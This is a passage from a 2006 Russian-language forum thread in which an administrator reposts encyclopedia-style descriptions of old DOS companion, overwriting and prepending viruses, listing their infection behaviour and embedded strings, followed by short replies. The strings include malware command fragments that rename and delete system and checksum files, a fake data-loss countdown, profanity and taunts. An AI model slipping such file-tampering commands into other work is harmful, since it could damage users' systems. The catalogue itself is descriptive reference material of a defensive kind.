изменяется. Вирус проверяет содержимое файлов на наличие строки "Microsoft Windows" и не трогает файлы с такой меткой. При возникновении ошибки вирус выводит сообщение: "Bad command or file name" и возвращается в DOS. Создан при помощи языка C - в кодах вируса можно найти несколько строк, вставляемых компилятором в коды программ. HLLC.Cornucopia Зашифрован и запакован PKLite. Записывает себя в файлы в двух различных формах. Содержит строку: detected the "Cornucopia Virus" HLLC.CP-Man Содержит (выводит?) строки: Very fast interrupt handler © PC Ace Technologies. Let me present: CP-VIRUS! Copyright © 1994-1995 CP-MaN of CP-DeZiGN Written in Vasteras of Sweden! Ya know... Your mom can't save ya know! ######## ######### Greets: # # # Oh, dear! I've trashed some sectors, but # # # still have them in memory (encrypted) and Phalcon # ######### will write them back to your disk if you Skism, # # just do as I say. Shit happens! Immortal # # Riot, ######## # Dark Avenger Check this counter. If you reset or turn your computer off now all your data will be lost forever. However, if you wait until the counter has reached zero you won't lose any data! It's your choice. Happy waiting! CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP left, then you will get your data back. Happy waiting! Finished! I'm impressed. You did really wait didn't you? Well, I just want you to know that I keep my promises. No data is destroyed. Oh, just one more thing. This virus does not destroy data at all, it would have been enough to reset the computer. Hope you enjoyed waiting! Hehehe... C:\DOS\MEM.DAT C:\DOS\MEM.EXE COMSPEC /C REN C:\DOS\MEM.EXE MEM.DAT /C COPY C:\DOS\MEM.EXE >NUL C:\DOS\SMARTDRV.DAT C:\DOS\SMARTDRV.EXE /C REN C:\DOS\SMARTDRV.EXE SMARTDRV.DAT C:\DOS\SMARTDRV.EXE *.exe CHKLIST. MS /C DEL CHKLIST.MS > NUL CHKLIST.CP /C DEL CHKLIST.CP > NUL /C REN >NUL HLLC.Cumulus При заражении дописывает к своему телу имя заражаемого файла, дату и время заражения. В результате этого зараженные файлы содержат имена всех своих предков и даты, когда эти предки были заражены. Вирус содержит строки: *.exe .com x.y Captain Cumulus travels .COM .EXE C:\PCTOOLS C:\WP51 C:\ACAD C:\EXCEL C:\WP C:\DOS ©CaptainCumulusandSantaClaus-Finland HLLC.Eagle.7705 Нерезидентный компаньон-вирус. Запакован утилитой Pklite, содержит в себе текст (также запакованный): Portions Copyright © 1983,91 Borland & Eagle Performance Software HLLC.Enrico Заражает boot сектора флоппи-дисков вирусом "March6". Содержит строку: © Enrico HLLC.FLV.10217 Содержит строку: Virus [Fired Love 10217] Version 1.0...! By L.S.Y. HLLC.Globe.6610 Создает .COM-файлы с именами обнаруженных .EXE-файлов. Скомпилирован на Turbo-C и запакован утилитой DIET. Содержит тексты: Turbo-C - Copyright © 1988 Borland Intl. Divide error Abnormal program termination Globe Virus V3.00 PATH *.EXE .COM .EXE HLLC.Happy Нерезидентные неопасные компаньон-вирусы. Ищут в текущем каталоге .EXE-файлы и создают для них файлы с теми же именами, но .COM-расширениями. Вирусы остаются резидентными, но не перехватывают ни одного 'вирусоопасного' прерывания, поэтому их следует считать нерезидентными. Вирусы семейства упакованы утилитами LZEXE и PKLITE. В октябре по понедельникам выводят текст: HAVE A "HAPPY MONDAY" LANCSPOLY SUCKERS. POP WILL EAT ITSELF и 'рожицы' (ASCII 1). HLLC.Halley.7856 Нерезидентный вирус-компаньон, ищет .EXE-файлы и записывает себя в .COM-файлы с теми же именами. Содержит в себе строки: HALLEY -virus v.1.0 Don`t panic, I`m the harmless one. I just want to travel... Have a nice day! Скомпилирован на Turbo Pascal'е, строка-копирайт библиотеки компилятора затерта другим сообщением: Shit happens... at WANT TO TRAVEL!! I WANT TO TRAVELL!! HLLC.IdoMoshe Этот вирус создает файлы VIRDEMO.EXE в корневых каталогах всех доступных дисков. Затем вирус изменяет или создает файлы AUTOEXEC.BAT в корневых каталогах, вирус записывает в начало этих файлов команды: Echo off virdemo Вирус выводит сообщение: YOU HAVE A IDO & MOSHE NON HAZARD DEMO VIRUS FOR CLEANING THIS VIRUS YOH MUST DELETE ALL VIRDEMO.EXE FILES IN ALL ROOT DIRECTORIES IN ALL YOUR DISK Также содержит строки: :\Virdemo.exe :\virdemo.exe :\autoexec.bat virdemo Echo off HLLC.Lanc Резидентный компаньон-вирус. Скомпилирован на Турбо-Паскале. Содержит строки: *.EXE .COM COMSPEC >HAVE A "HAPPY MONDAY" LANCSPOLY SUCKERS. POP WILL EAT ITSELF HLLC.Tpworm Безобидный нерезидентный вирус. Ищет .EXE-файлы и создает .COM-файлы с теми же именами. Эти .COM-файлы содержат только тело вируса. Вирус скомпилирован на Microsoft C и содержит все текстовые строки, которые Microsoft C вставляет в файлы. Периодически стирает зараженный файл и сообщает: Find me! HLLC.Ultimation Неопасный нерезидентный вирус. Ищет *.EXE-файлы, переименовывает их в "_*.EXE", а затем записывает себя вместо переименованных файлов. При запуске поражает первый незараженный EXE-файл, затем запускает на выполнение первоначальный файл. Откомпилирован на Turbo C, содержит в себе отладочный код и сообщения: Turbo C++ - Copyright 1990 Borland Intl. Null pointer assignment Divide error Abnormal program termination PATH *.EXE copy NUL Выводит одну из строк (случайно выбранную): I'm bored. Screw you. Life is a drag. kufc fof. Ouch! Don't hit me so hard. Floppy drive A: is flooded. Please insert J cloth. Murderer. You have been infected by ULTIMATION corp. Go directly to jail. Do not pass go. Do not collect $200. .Ah ha! Caught you. Copy protection error 23. Please re-install from master. HLLC.Aids.8064 Нерезидентный безобидный (?) компаньон-вирус. Если происходит запуск файла-двойника (т.е. файла-носителя вируса), для которого отсутствует исходный .EXE-файл, то вирус сообщает: Your computer is infected with ... Aids Virus II - Signed WOP & PGT of DutchCrack - Getting used to me ? Next time, Use a Condom ..... HLLO.Aids Написан на языке высокого уровня (видимо, Turbo-Pascal). Содержит текст: This File Has Been Infected By AIDS! HaHa! ************************************************ ********************* * ATTENTION: * * I have been elected to inform you that throughout your process of * * collecting and executing files, you have accidentally ****** * * yourself over; again, that's PHUCKED yourself over. No, it cannot * * be; YES, it CAN be, a ***** has infected your system. Now what do * * you have to say about that? HAHAHAHA. Have **** with this one and * * remember, there is NO cure for * * * * ########## ############ ########### ########## * * ###@@@@@@### @@@@##@@@@@@ ##@@@@@@@### ###@@@@@@@## * * ##@@ ##@ ##@ ##@ ##@ ##@@ @@ * * ##@ ##@ ##@ ##@ ##@ ##@ * * ############@ ##@ ##@ ##@ ############ * * ##@@@@@@@@##@ ##@ ##@ ##@ @@@@@@@@@##@ * * ##@ ##@ ##@ ##@ ##@ ##@ * * ##@ ##@ ##@ ##@ ###@ ## ###@ * * ##@ ##@ ############ ###########@@ ##########@@ * * @@ @@ @@@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@ * * * *********************************************** ********************** HLLO.Harakiri.5488 Очень опасный нерезидентный вирус, записывается вместо .COM- и .EXE-файлов. Зараженные файлы в результате этого не восстанавливаются и должны быть уничтожены. При заражении файлов выдает сообщения: Ej Infekterad....! Sdir = Infecting file File Already Infected Program too big to fit in memory Your PC is alive and infected with the HARAKIRI virus! Также содержит строки: *.* *.exe *.com Вирус скомпилирован на Турбо-Паскале, в теле вируса можно найти текстовые строки компилятора. HLLO.House.11636 Нерезидентный очень опасный вирус, поражает .EXE-файлы в текущем оглавлении, записывая свой код вместо заражаемых файлов. Старое содержимое файлов не сохраняется. Написан на языке C. Содержит в себе текст: *.exe *HOUSEVIRUS* *.exe rb rb rb+ HLLO.Joker При старте обходит каталоги дисков A: и C: и поражает в них не более 10 .EXE-файлов. После заражения файлов ищет .DBF-файлы и что-то записывает в них (укорачивает их?). Содержит строки: "C:\*.", "C: \", "C:\*.EXE", "\*.EXE", "C:\*.DBF", "\*.DBF", "A:\*.EXE", "A:\", "Runtime error at". Вместо запуска файла выдает одну из фраз: Error in EXE file File cannot be copied onto itself Compare OK Invalid Volume ID Format failure Incorrect DOS version Please put a new disk into drive A: End of input file END OF WORKTIME. TURN SYSTEM OFF! Divide Overflow Water detect in Co-processor I am hungry! Insert HAMBURGER into drive A: NO SMOKING, PLEASE! Thanks. Don't beat me !! Don't drink and drive. Another cup of cofee ? OH, YES! Can you fuck me ? Maybe ... Coca-Cola is it ! What about ? Oh, yes. O.K. TODAY Missing VGA! Call (209) 683-6858 ! Attention! Hard Disk is RADIOACTIVE! I'm so much dirty! CLEAN ME! Kiss my ... keyboard! Hard Disk's head has been destroyed. Can you borow me your one? Missing light magenta ribbon in printer! In case mistake, call GHOST BUSTERS Insert tractor toilet paper into printer. Are you funny? Keep smiling! Warning! In drive A: are two diskettes. Warning! Your mouse has some virus! Disconnect your mouse, there are some cats! I don't understand you. Can you repeat it? West Lake Software and Data Research, WA 0108077, New Orleans, © 1986 HLLO.Kamikaze Поражает .EXE-файлы в текущем оглавлении, содержит зашифрованную строку: kamikaze HLLO.Nova Нерезидентен, поражает .EXE-файлы, содержит/выводит строки: Finish demogroup NOVA 1994! This program needs installation. This is Dangerous Messanger, and here is my message to the world Bad command or file name Computer protected, no action. Dangerous Messanger was here! Can't initalize hardware... Try on another computer... *.exe *.* HLLO.NumOne Очень опасные нерезидентные вирусы, записываются вместо .COM-файлов. При заражении выводят текст: This file has been infected by Number One! infected. Скомпилированы на Turbo-Pascal'е и содержат все соответствующие строки: Copyright © 1985 BORLAND Inc Color display 80x25 Not enough memory$Incorrect DOS version$ Program aborted User Break I/O Run-time error "HLLO.NumOne.b" содержит текст: Monochrome display HLLO.Oscar Очень опасный нерезидентный вирус, ищет *.COM- и *.EXE-файлы на дисках C:, D:, ... и записывается вместо них. Содержит тескт: © by OSCAR Вирус запакован, после распаковки появляются и другие строки: General error reading drive Abort, Retry, File? © OSCAR. To dopiero pierwsze pozdrowienia dla S.Fischera i M.Sella. Runtime error at . Portions Copyright © 1983,90 Borland HLLO.Picked.4505 Выводит сообщения: Hey, horney, you shoulda used a CONDOM!!! There are no EXE files in You Have picked the file: HLLO.Pu Содержит строки: Infected with radioactive Pu ! Beware for radiation HLLO.Ruf Содержит строки: The 1993 RUW-virus has infected your system. The damage has taken place . . . . Directory has been removed from the system. Bad command or file name HLLO.Ruf Содержит/выводит строки: Packed file is corrupt(ed) TU, 1994 product in TP v7.0 HLLO.Shadowgard Нерезидентный очень опасный вирус, ищет .COM- и .EXE-файлы и записывается вместо них. После этого расшифровывает и выдает одно из сообщений: Illegal copy Insufficient memory Network busy Drive not ready Откомпилирован на Pascal'e. Строка сообщения об ошибке "Runtime error" заменена на строку: [Shadow-Gard] in This is only DEMO version ! Prepare... HLLP.7408 Создает TSR программу, которая совершает холостой цикл при каждом вызове INT 1Ch (timer) и INT 27h (KEEP). HLLP.5792 Поражает только .EXE-файлы, выводит сообщения: Error in *.EXE file Pa,pa slodki bobasku ... HLLP.6144 Содержит тексты, некоторые из них выводит на экран: <*>-==> isDev -Copyright © 1066 ScumSoft- <==-<*> disdev DisDev Portions Copyright © 1066 ScumSoft!! HLLP.7529 Содержит тексты: Insufficient DOS Version ... must be 3.2x or greater Write Protect Error \ Disk Full ... Error in file .EXE Abort. PATH Portions Copyright © 1983,90 Borland IO sono STANCO ! va a dormire anche tu HLLP.10460 Неопасный нерезидентный вирус, записывается в начало .COM-файлов текущего каталога. Откомпилирован на Turbo C++ и содержит все соответствующие строки-копирайты. При работе сообщает много полезной информации: Работает антивирус 'ANTILINE' вируса 'LINE' Лечу файл Ошибка ! Ошибка ! Файл вылечен Этот файл заражен вирусом 'LINE'. Работаю... Подождите пожалуйста, пока я заражу все файлы в этом дирректории. Заражаю файл Не могу закрыть файл Файл заражен Заражено файлов
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:40:09 | Сообщение # 41 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| (продолжение) HLLP.15392 Выводит на экран довольно длинный текст: M.S. Jurusalem Virus This is a HARMLESS virus Do not panick this is a Harmless Virus <<< Press any key to continue >> Do not worry this virus is designed to avoide making any damage to your files. A free Virus remover will be send to computer Magazines:by then 30th of oct 1992 So they can supply to coustomers. This is a demonstration of what a Palestinian Boy can do. It is made by one of these Palestinians who are suffering every day in their own homes because they don`t want to leave these homes. It is the most unfair situation in the world, it is a crime which the West has committed long time ago and still committing it until now under the name of PEACE. Look at the Israelis, Western and Arabic governments. They are criminals who talks about peace and freedom but they never allow them and here are the Palestinians nation in Israel standing in their land fighting for their own rights no matter what happens while U.S.A., Europe and some of the Arabic nations supporting the Israelis to fight and finish this small nation whom Jesus was one of them and after all this they call them selfs Christians. It is Very easy to see this truth just wake up and remember that one day you and your nationIare going to stand in front of the Creator of this world to be judged on what you and your country did to the innocent people. There is a lot a person can do to help a nation at least by supporting this nation. It is very easy to such a virus to destroy your data but this is not the manners of a good Palestinian. Our soul is light our heart is white our mind is bright and we will always be the same no matter what we go through. Signature: A Palestinian teenager. Sorry for interrupting your work HLLP.Animus Нерезидентные вирусы. Ищут и записываются в начало .COM- и EXE-файлов. Содержат строки: COMMAND.COM Animus.id Animus.exe Portions Copyright © 1983,90 Borland "HLLP.Animus.b" выводит на экран текст: Give me CooKie? (use all Lower Case) vanilla wafer chocolate chip oreo hydrox HLLP.Bdaagwa Запакован неизвестным мне упаковщиком, распакованное тело вируса содержит строки: Your PC is now BDаПGWA! (v1.2) This program can not be executed because it is infected with a virus! HLLP.Bishkek "HLLP.Bishkek.4160" неопасен. Выводит сообщение: Smokie4 virus © BISHKEK 1996 "HLLP.Bishkek.4240" очень опасен - стирает boot-сектора дисков и выводит текст: 2Smokie3 virus,i zater tvoi sector,Ti ponal? Y/N Также содержит строки: Smokie3 © by Bishkek 1996 Pentium HLLP.Dupalec Неопасный нерезидентный вирус, ищет .COM- и .EXE-файлы и записывается в их начало. При поражении файлов вызывает как подпроцессы DOS'овские команды RENAME и DEL. Вирус содержит в себе тексты: /C rename dupalec.exe comspec /C del dupalec.exe dupacel.exe /C rename dupa.exe comspec /C rename dupacel.exe /C del /C rename dupa.exe protekt Cannot write .INI *.exe COMMAND.COM *.com NIEDZIALAJ Runtime error at . Portions Copyright © 1983,90 Borland Pozdrowienia dla SZEFA! Jak tam maТy Szmitek? A teraz na powaзnie ( mam polskie znaki w standardzie Mazowii ) PROSZР NIE STRASZYХ DZIECI IN Периодически выводит одну из фраз: Przerwa obiadowa do 13:15 WyszТam za mЖз.Zaraz wracam. Juз dawno po bajce! ZgТodniaТem Uwaзaj.W kuchni jest duch. "Master of puppets" to stara dobra poezja Юpiewana Czarny blues o 4-tej nad ranem? ProszС nie straszyН dzieci informatyk HLLP.Globe.5150 Безобидный нерезидентный вирус. Записывается в начало .COM- и .EXE-файлов. Скомпилирован на Turbo-Pascal'е и запакован утилитой LZEXE. Содержит текст: HELLO!!!!! - GlobeVirus V3.00 HLLP.Halloween Нерезидентный безобидный вирус, ищет и записывается в начало .COM- и .EXE-файлов. Содержит строки: *.* ALL GONE Happy Halloween .COM .EXE instal.exe /C instal.exe COMSPEC *.COM *.EXE savefrom.667 Runtime error at HLLP.Legs При заражении шифрует файлы. Содержит зашифрованную строку: DEATH ON TWO LEGS Was Here HLLP.Lomza Нерезидентный очень опасный вирус. Ищет .COM- и .EXE-файлы в каталогах дисков A:, B:, C:, D: и записывается в их начало. В некоторые файлы записывает команду перехода не перезагрузку (JMP F000:FFF0). Написан на языке Turbo-Pascal. HLLP.Nazi, HLLO.Nazi "Nazi.4415" запакован. "Nazi.4240" записывается вместо файлов. Все вирусы семейства "Nazi" содержат в себе текст: ON THE SABBATH.. THE GHOST OF HITLER SPEAKS : "MY FELLOW NAZI'S.. I WAS WRONG.." "I NOW COMMAND YOU TO COMMIT SUICIDE.. NOT GENOCIDE.." "O IT.. SO THE WORLD WILL BE RID OF THE NAZIPEST.. "AND ALL AUSLANDER CAN TRUELY BE FREE OF NAZIPHOBIA.. NaZiPhobia © [VooDoo].. We support the message.. Portions Copyright © 1983,90 Borland HLLP.NotFound Выводит текст: Borland Virus © 1994 Processor Intel PentiumTM not found. 17Gb disk free space not found. 512Mb extended memory not found. 16Mb XGA Video card not found. Sound Blaster not found. Sorry, your configuration doesn't match to run this... HLLP.Rangel.5000 Содержит строку: © RANGEL HLLP.Rsw.5846 Содержит (и выводит?) строки: Я люблю пиво,компы и женщин By Rsw. Version 2.10 COMMAND.COM VC.COM CUT-REM.EXE Блин , сегодня мой день рождения. Я так рад , что не буду даже не чего зарожать ;-) Copyright © 1994 by RSW Release 17.06.94 , v. 2.10 (BugFix) nortom.ini HLLP.Sarka Содержит (и выводит?) строки: c:\working\zaloha c:\working\zaloha\1.1 Dobry den pane jsem vr SARKA a ocitl jsem se spatky na vasem pocitaci. *.exe *.WINDOWS \work.exe WARNING: DANGEROUS SUPER"IR S A R K A Nazdaaaaaaar zdravy vas pocitacovy supervir S A R K A ! Pro zacatek bych mel pro vas nekolik uzitecnych rad: I 1. v pripade resetnuti pocitace nebo vypnuti vas pocitac okamzite totalne zlikvyduji (neberte to jako vyhrusku) 2. tento vir je opravdu spicka proto zavirovane soubory nahravejte svym pratelum a znamym at si tento vir taky vychutnaji 3. nahnete se bliz k pocitaci jsem totiz prenosny i na lidi po precteni stisknete SPACE ! WARNING ! Opravdu sis myslel ze tvuj pocitac neznicim ! Tak to sis myslel spatne !!!!!!! sacod.exe COMSPEC HLLP.Sauron.4568 Содержит строки: SAURON 4568 Wielkanocne pozdrowienia sklada Sauron HLLP.Vova Зашифрован, содержит строки: © Dialogue, Rust. 1993 vir *.com *.exe COMMAND.COM NCMAIN.EXE EMM386.EXE NC.EXE \VIR comspec /c ren v /c>nul copy/b \vir /c del vir? ***ProfVovaVir 10.1 (INVECTOR),Give my best regards to LENA !!! © 1992-94 by Vova of Ufa,11/03/94 (max. probability accident=1/128)*** HLLP.VVC.8304 Содержит (и выводит?) строки: I'm sorry You hawe virus. My name VVC 13 version 1.0 beta. Special Thank's auhtor viruses Yeanke Doodle , Lozinsky D.N. Virus by VVC & RSW release 25.02.94 HLLP.Zenit Выводит картинку: ######## @@@@@ ###### ####### # ## @@@@@ ### ### ### ### ### @@@ ### ### ### #### ################################# @@ ### ### ### ### ####### # # # # # ######## ######## ####### ####### ####### # ### # ### ### ### ## # # # # #### # # ### ### ### ## ## ####### # # # # # ### ### ### ### ## ## ######## ####### ## ### ### Санкт-Петербургский Футбольный клуб "ЗЕНИТ"! FAN CLUB 33 Лучше клуба нам не надо, чем ЗЕНИТ из Ленинграда +------------------------------------- ---------------------------------+ | З Е Н И Т - F O R E V E R | +---------------------------------------------- ------------------------+ Владимир Кулик, Игорь Данилов (футболист, а не вирусолог), Денис Зубко Борис Матвеев, Сергей Дмитриев, ... , и, конечно же, П.Ф. Садырин <END>
Настали суровые времена. Связь: LEONeso@gmail.com
Сообщение отредактировал Battle - Четверг, 2006.02.16, 02:41:01 |
|
| |
MeDVeD | Дата: Воскресенье, 2006.03.05, 16:11:50 | Сообщение # 42 |
Генерал-лейтенант
Группа: Старшие модераторы
Сообщений: 514
Статус: Offline
| Battle, ужасъ..........
|
|
| |
Battle | Дата: Понедельник, 2006.03.06, 20:15:08 | Сообщение # 43 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Сторож, ну да.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
MeDVeD | Дата: Вторник, 2006.03.07, 00:19:31 | Сообщение # 44 |
Генерал-лейтенант
Группа: Старшие модераторы
Сообщений: 514
Статус: Offline
| Battle, где ты этого всего набрался-то??? ....и ваще лучше бы не говорил я бы жил своей спокойной нубской жизнью.....
|
|
| |
Battle | Дата: Среда, 2006.03.08, 09:52:03 | Сообщение # 45 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Сторож, ну хоть будеш знать кто к тебе хочет пролезь.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
|